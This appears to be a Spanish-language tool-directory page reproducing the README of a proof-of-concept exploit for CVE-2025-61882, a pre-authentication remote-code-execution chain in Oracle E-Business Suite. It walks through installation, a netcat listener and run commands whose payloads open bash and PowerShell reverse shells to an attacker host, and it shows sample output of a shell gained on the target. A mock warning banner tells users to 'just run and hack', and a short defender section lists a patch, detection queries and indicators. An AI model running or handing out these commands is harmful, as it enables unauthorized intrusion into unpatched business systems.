Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61882-POC — Exploit para CVE-2025-61882, una RCE crítica de pre-autenticación en Oracle E-Business Suite. Combina SSRF, inyección CRLF, HTTP smuggling e inyección XSLT para la ejecución remota de código sin autenticación. | Kitploit
Herramientas/GitHubGitHub/mindflarex/cve-2025-61882-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

Exploit para CVE-2025-61882, una RCE crítica de pre-autenticación en Oracle E-Business Suite. Combina SSRF, inyección CRLF, HTTP smuggling e inyección XSLT para la ejecución remota de código sin autenticación.

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de pruebas de seguridad CVE-2025-61882

CVSS Status Platform License

🚨 ADVERTENCIA LEGAL CRÍTICA

Consulta nuestra publicación en el blog para obtener detalles técnicos

ESTA HERRAMIENTA ES SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Descripción general

Herramienta de pruebas de seguridad para CVE-2025-61882, una vulnerabilidad crítica de ejecución remota de código sin autenticación previa que afecta a Oracle E-Business Suite.

Creado por: Mindflare

Detalles de la vulnerabilidad

  • CVE ID: CVE-2025-61882
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Red (sin autenticación)
  • Complejidad de ataque: Media
  • Privilegios requeridos: Ninguno
  • Interacción del usuario: Ninguna
  • Versiones afectadas: Oracle E-Business Suite 12.2.3 - 12.2.14
  • Estado del parche: Parche de emergencia publicado el 4 de octubre de 2025
  • Estado de explotación: ⚠️ EXPLOTADA ACTIVAMENTE por el ransomware Cl0p desde agosto de 2025

Resumen técnico

CVE-2025-61882 es una sofisticada cadena de exploits que combina cinco vulnerabilidades distintas:

  1. SSRF - Falsificación de solicitudes del lado del servidor a través de /OA_HTML/configurator/UiServlet
  2. Inyección CRLF - Inyección de cabeceras HTTP en el parámetro return_url
  3. Contrabando HTTP - Abuso de conexiones keep-alive para alcanzar servicios internos (puerto 7201)
  4. Omisión de autenticación - Path traversal mediante el prefijo /OA_HTML/help/../
  5. Inyección XSLT - El procesamiento de plantillas XSL maliciosas conduce a RCE

🎯 Casos de uso previstos

✅ Uso aceptable

  • Pruebas de penetración autorizadas con permiso por escrito
  • Investigación de seguridad en sistemas de tu propiedad
  • Validación de vulnerabilidades en entornos de laboratorio controlados
  • Ejercicios de red team con documentación de alcance adecuada
  • Investigación académica con aprobación institucional
  • Respuesta a incidentes y análisis forense

❌ Uso prohibido

  • Cualquier acceso no autorizado a sistemas
  • Probar sistemas sin permiso explícito por escrito
  • Actividades maliciosas o causar daño
  • Atacar sistemas de producción sin aprobación
  • Usarlo con fines delictivos
  • Cualquier actividad que infrinja las leyes aplicables

📦 Instalación

Requisitos previos

  • Python 3.7 o superior
  • Administrador de paquetes pip
  • Conectividad de red con el objetivo (solo autorizada)
  • Netcat o un listener similar para recibir reverse shell

Configuración

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Uso

Paso 1: Configura tu listener

En una terminal separada, inicia un listener de netcat:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Paso 2: Ejecuta la herramienta

Uso básico (objetivo Linux):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Objetivo Windows:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Parámetros

ParámetroDescripciónObligatorioEjemplo
--targetURL de Oracle EBS objetivoSíhttp://192.168.1.22:8000
--lhostTu dirección IP (para callbacks)Sí192.168.1.10
--lportPuerto del servidor HTTP (sirve el payload XSL)Sí80 o 8080
--commandComando a ejecutar en el objetivoSíVer ejemplos anteriores
--platformSistema operativo del objetivo: linux o windowsSílinux

📊 Ejemplo de salida

Salida de la herramienta

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Salida del listener de Netcat (si es vulnerable)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Detección y defensa

Para defensores de seguridad

Acciones inmediatas

  1. Aplica el parche de emergencia de Oracle (ID de documento: 30061882.1)
  2. Busca indicios de compromiso:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Revisa los registros de acceso desde agosto de 2025
  4. Bloquea el acceso a Internet saliente desde los servidores EBS

Indicadores de detección

IOCs de red:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)

Patrones HTTP:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • Caracteres CRLF en los parámetros

📚 Referencias

  • Aviso de alerta de seguridad de Oracle
  • Catálogo KEV de CISA
  • Análisis de Google/Mandiant
  • Investigación de watchTowr Labs

📜 Licencia

Licencia MIT con restricciones de uso educativo: consulta LICENSE

AVISO LEGAL: Este software es exclusivamente para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el uso indebido.


root@kitploit:~

**Created by:** Mindflare | **Last Updated:** October 2025
Descargar herramienta